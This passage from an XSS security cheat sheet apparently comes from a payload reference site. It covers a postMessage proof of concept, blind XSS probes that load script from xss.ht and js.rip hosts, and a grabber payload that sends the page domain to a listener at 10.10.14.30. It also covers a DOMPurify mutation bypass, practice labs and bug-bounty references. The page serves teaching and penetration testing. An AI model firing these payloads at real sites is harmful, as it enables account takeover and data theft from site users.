<a id="__codelineno-29-3" name="__codelineno-29-3" href="#__codelineno-29-3"></a> <span class="p">&lt;</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">button</span> <span class="na">value</span><span class="o">=</span><span class="s">&quot;Click Me&quot;</span> <span class="na">id</span><span class="o">=</span><span class="s">&quot;btn&quot;</span><span class="p">&gt;</span>
<a id="__codelineno-29-4" name="__codelineno-29-4" href="#__codelineno-29-4"></a><span class="p">&lt;/</span><span class="nt">body</span><span class="p">&gt;</span>
<a id="__codelineno-29-5" name="__codelineno-29-5" href="#__codelineno-29-5"></a>
<a id="__codelineno-29-6" name="__codelineno-29-6" href="#__codelineno-29-6"></a><span class="p">&lt;</span><span class="nt">script</span><span class="p">&gt;</span>
<a id="__codelineno-29-7" name="__codelineno-29-7" href="#__codelineno-29-7"></a><span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="s1">&#39;btn&#39;</span><span class="p">).</span><span class="nx">onclick</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="kd">function</span><span class="p">(</span><span class="nx">e</span><span class="p">){</span>
<a id="__codelineno-29-8" name="__codelineno-29-8" href="#__codelineno-29-8"></a><span class="w"> </span><span class="nb">window</span><span class="p">.</span><span class="nx">poc</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nb">window</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="s1">&#39;http://www.redacted.com/#login&#39;</span><span class="p">);</span>
<a id="__codelineno-29-9" name="__codelineno-29-9" href="#__codelineno-29-9"></a><span class="w"> </span><span class="nx">setTimeout</span><span class="p">(</span><span class="kd">function</span><span class="p">(){</span>
<a id="__codelineno-29-10" name="__codelineno-29-10" href="#__codelineno-29-10"></a><span class="w"> </span><span class="nb">window</span><span class="p">.</span><span class="nx">poc</span><span class="p">.</span><span class="nx">postMessage</span><span class="p">(</span>
<a id="__codelineno-29-11" name="__codelineno-29-11" href="#__codelineno-29-11"></a><span class="w"> </span><span class="p">{</span>
<a id="__codelineno-29-12" name="__codelineno-29-12" href="#__codelineno-29-12"></a><span class="w"> </span><span class="s2">&quot;sender&quot;</span><span class="o">:</span><span class="w"> </span><span class="s2">&quot;accounts&quot;</span><span class="p">,</span>
<a id="__codelineno-29-13" name="__codelineno-29-13" href="#__codelineno-29-13"></a><span class="w"> </span><span class="s2">&quot;url&quot;</span><span class="o">:</span><span class="w"> </span><span class="s2">&quot;javascript:confirm(&#39;XSS&#39;)&quot;</span><span class="p">,</span>
<a id="__codelineno-29-14" name="__codelineno-29-14" href="#__codelineno-29-14"></a><span class="w"> </span><span class="p">},</span>
<a id="__codelineno-29-15" name="__codelineno-29-15" href="#__codelineno-29-15"></a><span class="w"> </span><span class="s1">&#39;*&#39;</span>
<a id="__codelineno-29-16" name="__codelineno-29-16" href="#__codelineno-29-16"></a><span class="w"> </span><span class="p">);</span>
<a id="__codelineno-29-17" name="__codelineno-29-17" href="#__codelineno-29-17"></a><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="mf">2000</span><span class="p">);</span>
<a id="__codelineno-29-18" name="__codelineno-29-18" href="#__codelineno-29-18"></a><span class="p">}</span>
<a id="__codelineno-29-19" name="__codelineno-29-19" href="#__codelineno-29-19"></a><span class="p">&lt;/</span><span class="nt">script</span><span class="p">&gt;</span>
<a id="__codelineno-29-20" name="__codelineno-29-20" href="#__codelineno-29-20"></a><span class="p">&lt;/</span><span class="nt">html</span><span class="p">&gt;</span>
</code></pre></div>
<h2 id="blind-xss">Blind XSS</h2>
<h3 id="xss-hunter">XSS Hunter</h3>
<blockquote>
<p>XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.</p>
</blockquote>
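<p>XSS Hunter is deprecated; it was available at <a href="https://xsshunter.com/app">https://xsshunter.com/app</a>. The probe hostnames in the examples below date from that original service: replace them with the hostname of an instance you control, because a fired probe sends the collected page data to whoever operates that host.</p>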
<p>You can set up an alternative version:</p>
<ul>
<li>Self-hosted version from <a href="https://github.com/mandatoryprogrammer/xsshunter-express">mandatoryprogrammer/xsshunter-express</a></li>
<li>Hosted on <a href="https://xsshunter.trufflesecurity.com/">xsshunter.trufflesecurity.com</a></li>
</ul>
<div class="highlight"><pre><span></span><code><a id="__codelineno-30-1" name="__codelineno-30-1" href="#__codelineno-30-1"></a>&quot;&gt;<span class="nt">&lt;script</span><span class="w"> </span><span class="na">src=</span><span class="s">&quot;https://js.rip/&lt;custom.name&gt;&quot;</span><span class="nt">&gt;&lt;/script&gt;</span>
<a id="__codelineno-30-2" name="__codelineno-30-2" href="#__codelineno-30-2"></a>&quot;&gt;<span class="nt">&lt;script</span><span class="w"> </span><span class="na">src=</span><span class="s">//&lt;custom.subdomain</span><span class="nt">&gt;</span>.xss.ht&gt;<span class="nt">&lt;/script&gt;</span>
<a id="__codelineno-30-3" name="__codelineno-30-3" href="#__codelineno-30-3"></a><span class="nt">&lt;script&gt;</span>$.getScript(&quot;//<span class="nt">&lt;custom.subdomain&gt;</span>.xss.ht&quot;)<span class="nt">&lt;/script&gt;</span>
</code></pre></div>
<h3 id="other-blind-xss-tools">Other Blind XSS tools</h3>
<ul>
<li><a href="https://github.com/Netflix-Skunkworks/sleepy-puppy">Netflix-Skunkworks/sleepy-puppy</a> - Sleepy Puppy XSS Payload Management Framework</li>
<li><a href="https://github.com/LewisArdern/bXSS">LewisArdern/bXSS</a> - bXSS is a utility which can be used by bug hunters and organizations to identify Blind Cross-Site Scripting. </li>
<li><a href="https://github.com/ssl/ezXSS">ssl/ezXSS</a> - ezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting. </li>
</ul>
<h3 id="blind-xss-endpoint">Blind XSS endpoint</h3>
<ul>
<li>Contact forms</li>
<li>Ticket support</li>
<li>Referer Header</li>
<li>Custom Site Analytics</li>
<li>Administrative Panel logs</li>
<li>User Agent</li>
<li>Comment Box</li>
<li>Administrative Panel</li>
</ul>
<h3 id="tips">Tips</h3>
<p>You can use a <a href="#data-grabber-for-xss">Data grabber for XSS</a> and a one-line HTTP server to confirm the existence of a blind XSS before deploying a heavy blind-XSS testing tool.</p>
<p>E.g. payload:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-31-1" name="__codelineno-31-1" href="#__codelineno-31-1"></a><span class="p">&lt;</span><span class="nt">script</span><span class="p">&gt;</span><span class="nb">document</span><span class="p">.</span><span class="nx">location</span><span class="o">=</span><span class="s1">&#39;http://10.10.14.30:8080/XSS/grabber.php?c=&#39;</span><span class="o">+</span><span class="nb">document</span><span class="p">.</span><span class="nx">domain</span><span class="p">&lt;/</span><span class="nt">script</span><span class="p">&gt;</span>
</code></pre></div>
<p>E.g. one-line HTTP server:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-32-1" name="__codelineno-32-1" href="#__codelineno-32-1"></a><span class="p">$</span> <span class="n">ruby</span> <span class="n">-run</span> <span class="n">-ehttpd</span> <span class="p">.</span> <span class="n">-p8080</span>
</code></pre></div>
<h2 id="mutated-xss">Mutated XSS</h2>
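<p>Use browser quirks to recreate some HTML tags: markup that a sanitizer judged harmless is rewritten by the browser when it is parsed again (for example through <code>innerHTML</code>), yielding elements or attributes the sanitizer never saw. Keeping the sanitizer library up to date is the main defence, as such bypasses are patched in sanitizer updates.</p>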
<p><strong>Example</strong>: Mutated XSS from Masato Kinugawa, used against the <a href="https://github.com/cure53/DOMPurify">cure53/DOMPurify</a> component on Google Search.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-33-1" name="__codelineno-33-1" href="#__codelineno-33-1"></a><span class="o">&lt;</span><span class="nx">noscript</span><span class="o">&gt;&lt;</span><span class="nx">p</span><span class="w"> </span><span class="nx">title</span><span class="o">=</span><span class="s2">&quot;&lt;/noscript&gt;&lt;img src=x onerror=alert(1)&gt;&quot;</span><span class="o">&gt;</span>
</code></pre></div>
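<p>Technical blog posts are available at:</p>
<ul>
<li><a href="https://www.acunetix.com/blog/web-security-zone/mutation-xss-in-google-search/">https://www.acunetix.com/blog/web-security-zone/mutation-xss-in-google-search/</a></li>
<li><a href="https://research.securitum.com/dompurify-bypass-using-mxss/">https://research.securitum.com/dompurify-bypass-using-mxss/</a></li>
</ul>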
<h2 id="labs">Labs</h2>
<ul>
<li><a href="https://portswigger.net/web-security/all-labs#cross-site-scripting">PortSwigger Labs for XSS</a></li>
<li><a href="https://www.root-me.org/en/Challenges/Web-Client/XSS-Reflected">Root Me - XSS - Reflected</a></li>
<li><a href="https://www.root-me.org/en/Challenges/Web-Server/XSS-Server-Side">Root Me - XSS - Server Side</a></li>
<li><a href="https://www.root-me.org/en/Challenges/Web-Client/XSS-Stored-1">Root Me - XSS - Stored 1</a></li>
<li><a href="https://www.root-me.org/en/Challenges/Web-Client/XSS-Stored-2">Root Me - XSS - Stored 2</a></li>
<li><a href="https://www.root-me.org/en/Challenges/Web-Client/XSS-Stored-filter-bypass">Root Me - XSS - Stored - Filter Bypass</a></li>
<li><a href="https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based-Introduction">Root Me - XSS DOM Based - Introduction</a></li>
<li><a href="https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based-AngularJS">Root Me - XSS DOM Based - AngularJS</a></li>
<li><a href="https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based-Eval">Root Me - XSS DOM Based - Eval</a></li>
<li><a href="https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based-Filters-Bypass">Root Me - XSS DOM Based - Filters Bypass</a></li>
<li><a href="https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based">Root Me - XSS - DOM Based</a></li>
<li><a href="https://www.root-me.org/en/Challenges/Web-Client/Self-XSS-DOM-Secrets">Root Me - Self XSS - DOM Secrets</a></li>
<li><a href="https://www.root-me.org/en/Challenges/Web-Client/Self-XSS-Race-Condition">Root Me - Self XSS - Race Condition</a></li>
</ul>
<h2 id="references">References</h2>
<ul>
<li><a href="http://mksben.l0.cm/2016/07/xxn-caret.html">Abusing XSS Filter: One ^ leads to XSS (CVE-2016-3212) - Masato Kinugawa (@kinugawamasato) - July 15, 2016</a></li>
<li><a href="https://sites.google.com/site/bughunteruniversity/best-reports/account-recovery-xss">Account Recovery XSS - Gábor Molnár - April 13, 2016</a></li>
<li><a href="https://whitton.io/articles/xss-on-facebook-via-png-content-types/">An XSS on Facebook via PNGs &amp; Wonky Content Types - Jack Whitton (@fin1te) - January 27, 2016</a></li>
<li><a href="https://portswigger.net/support/bypassing-signature-based-xss-filters-modifying-script-code">Bypassing Signature-Based XSS Filters: Modifying Script Code - PortSwigger - August 4, 2020</a></li>
<li><a href="http://sasi2103.blogspot.sg/2016/09/combination-of-techniques-lead-to-dom.html">Combination of techniques lead to DOM Based XSS in Google - Sasi Levi - September 19, 2016</a></li>
<li><a href="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet">Cross-site scripting (XSS) cheat sheet - PortSwigger - September 27, 2019</a></li>
<li><a href="https://www.sonarsource.com/blog/encoding-differentials-why-charset-matters/">Encoding Differentials: Why Charset Matters - Stefan Schiller - July 15, 2024</a></li>
<li><a href="http://www.paulosyibelo.com/2015/12/facebooks-moves-oauth-xss.html">Facebook's Moves - OAuth XSS - Paulos Yibelo - December 10, 2015</a></li>
<li><a href="https://labs.detectify.com/2013/02/14/how-i-got-the-bug-bounty-for-mega-co-nz-xss/">Frans Rosén on how he got Bug Bounty for Mega.co.nz XSS - Frans Rosén - February 14, 2013</a></li>
<li><a href="https://labs.detectify.com/2015/06/06/google-xss-turkey/">Google XSS Turkey - Frans Rosén - June 6, 2015</a></li>
<li><a href="https://medium.com/@marin_m/how-i-found-a-5-000-google-maps-xss-by-fiddling-with-protobuf-963ee0d9caff#.cktt61q9g">How I found a $5,000 Google Maps XSS (by fiddling with Protobuf) - Marin Moulinier - March 9, 2017</a></li>
<li><a href="http://conference.hitb.org/hitbsecconf2012ams/materials/D1T2%20-%20Itzhak%20Zuk%20Avraham%20and%20Nir%20Goldshlager%20-%20Killing%20a%20Bug%20Bounty%20Program%20-%20Twice.pdf">Killing a bounty program, Twice - Itzhak (Zuk) Avraham and Nir Goldshlager - May 2012</a></li>
<li><a href="https://cure53.de/fp170.pdf">mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang - September 26, 2013</a></li>
<li><a href="https://labs.detectify.com/2016/12/15/postmessage-xss-on-a-million-sites/">postMessage XSS on a million sites - Mathias Karlsson - December 15, 2016</a></li>
<li><a href="https://web.archive.org/web/20220521125028/https://blog.innerht.ml/rpo-gadgets/">RPO that lead to information leakage in Google - @filedescriptor - July 3, 2016</a></li>
<li><a href="https://youtu.be/Sm4G6cAHjWM">Secret Web Hacking Knowledge: CTF Authors Hate These Simple Tricks - Philippe Dourassov - May 13, 2024</a></li>
<li><a href="https://hackerone.com/reports/207042">Stealing contact form data on www.hackerone.com using Marketo Forms XSS with postMessage frame-jumping and jQuery-JSONP - Frans Rosén (fransrosen) - February 17, 2017</a></li>
<li><a href="https://web.archive.org/web/20161228182923/http://dawgyg.com/2016/12/07/stored-xss-affecting-all-fantasy-sports-fantasysports-yahoo-com-2/">Stored XSS affecting all fantasy sports [*.fantasysports.yahoo.com] - thedawgyg - December 7, 2016</a></li>
<li><a href="https://whitton.io/archive/persistent-xss-on-myworld-ebay-com/">Stored XSS in *.ebay.com - Jack Whitton (@fin1te) - January 27, 2013</a></li>
<li><a href="http://web.archive.org/web/20130420095223/http://www.breaksec.com/?p=6129">Stored XSS In Facebook Chat, Check In, Facebook Messenger - Nirgoldshlager - April 17, 2013</a></li>
<li><a href="https://hackerone.com/reports/152067">Stored XSS on developer.uber.com via admin account compromise in Uber - James Kettle (@albinowax) - July 18, 2016</a></li>
<li><a href="https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd">Stored XSS on Snapchat - Mrityunjoy - February 9, 2018</a></li>
<li><a href="https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html">Stored XSS, and SSRF in Google using the Dataset Publishing Language - Craig Arendt - March 7, 2018</a></li>
<li><a href="https://hackerone.com/reports/150179">Tricky HTML Injection and Possible XSS in sms-be-vip.twitter.com - Ahmed Aboul-Ela (@aboul3la) - July 9, 2016</a></li>
<li><a href="https://hackerone.com/reports/260744">Twitter XSS by stopping redirection and javascript scheme - Sergey Bobrov (bobrov) - September 30, 2017</a></li>
<li><a href="https://whitton.io/articles/uber-turning-self-xss-into-good-xss/">Uber Bug Bounty: Turning Self-XSS into Good XSS - Jack Whitton (@fin1te) - March 22, 2016</a></li>
<li><a href="https://httpsonly.blogspot.hk/2016/08/turning-self-xss-into-good-xss-v2.html">Uber Self XSS to Global XSS - httpsonly - August 29, 2016</a></li>
<li><a href="https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot">Unleashing an Ultimate XSS Polyglot - Ahmed Elsobky - February 16, 2018</a></li>
<li><a href="http://web.archive.org/web/20160810033728/https://blog.bugcrowd.com/guest-blog-using-a-braun-shaver-to-bypass-xss-audit-and-waf-by-frans-rosen-detectify">Using a Braun Shaver to Bypass XSS Audit and WAF - Frans Rosen - April 19, 2016</a></li>
<li><a href="https://gist.github.com/tomnomnom/14a918f707ef0685fdebd90545580309">Ways to alert(document.domain) - Tom Hudson (@tomnomnom) - February 22, 2018</a></li>
<li><a href="https://wesecureapp.com/blog/xss-by-tossing-cookies/">XSS by Tossing Cookies - WeSecureApp - July 10, 2017</a></li>
<li><a href="http://d3adend.org/xss/ghettoBypass">XSS ghettoBypass - d3adend - September 25, 2015</a></li>
<li><a href="http://zhchbin.github.io/2017/08/30/Uber-XSS-via-Cookie/">XSS in Uber via Cookie - zhchbin - August 30, 2017</a></li>
<li><a href="https://hackerone.com/reports/231053">XSS on any Shopify shop via abuse of the HTML5 structured clone algorithm in postMessage listener - Luke Young (bored-engineer) - May 23, 2017</a></li>
<li><a href="http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html">XSS via Host header - www.google.com/cse - Michał Bentkowski - April 22, 2015</a></li>
<li><a href="http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html">Xssing Web With Unicodes - Rakesh Mane - August 3, 2017</a></li>
<li><a href="https://klikki.fi/adv/yahoo.html">Yahoo Mail stored XSS - Jouko Pynnönen - January 19, 2016</a></li>
<li><a href="https://klikki.fi/adv/yahoo2.html">Yahoo Mail stored XSS #2 - Jouko Pynnönen - December 8, 2016</a></li>
</ul>
<aside class="md-source-file">
<span class="md-source-file__fact">
<span class="md-icon" title="Last update">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M21 13.1c-.1 0-.3.1-.4.2l-1 1 2.1 2.1 1-1c.2-.2.2-.6 0-.8l-1.3-1.3c-.1-.1-.2-.2-.4-.2m-1.9 1.8-6.1 6V23h2.1l6.1-6.1zM12.5 7v5.2l4 2.4-1 1L11 13V7zM11 21.9c-5.1-.5-9-4.8-9-9.9C2 6.5 6.5 2 12 2c5.3 0 9.6 4.1 10 9.3-.3-.1-.6-.2-1-.2s-.7.1-1 .2C19.6 7.2 16.2 4 12 4c-4.4 0-8 3.6-8 8 0 4.1 3.1 7.5 7.1 7.9l-.1.2z"/></svg>
</span>
<span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-date">November 30, 2024</span>
</span>
</aside>
</article>
</div>
<script>var target=document.getElementById(location.hash.slice(1));target&&target.name&&(target.checked=target.name.startsWith("__tabbed_"))</script>
</div>
</main>
</div>
</body>
</html>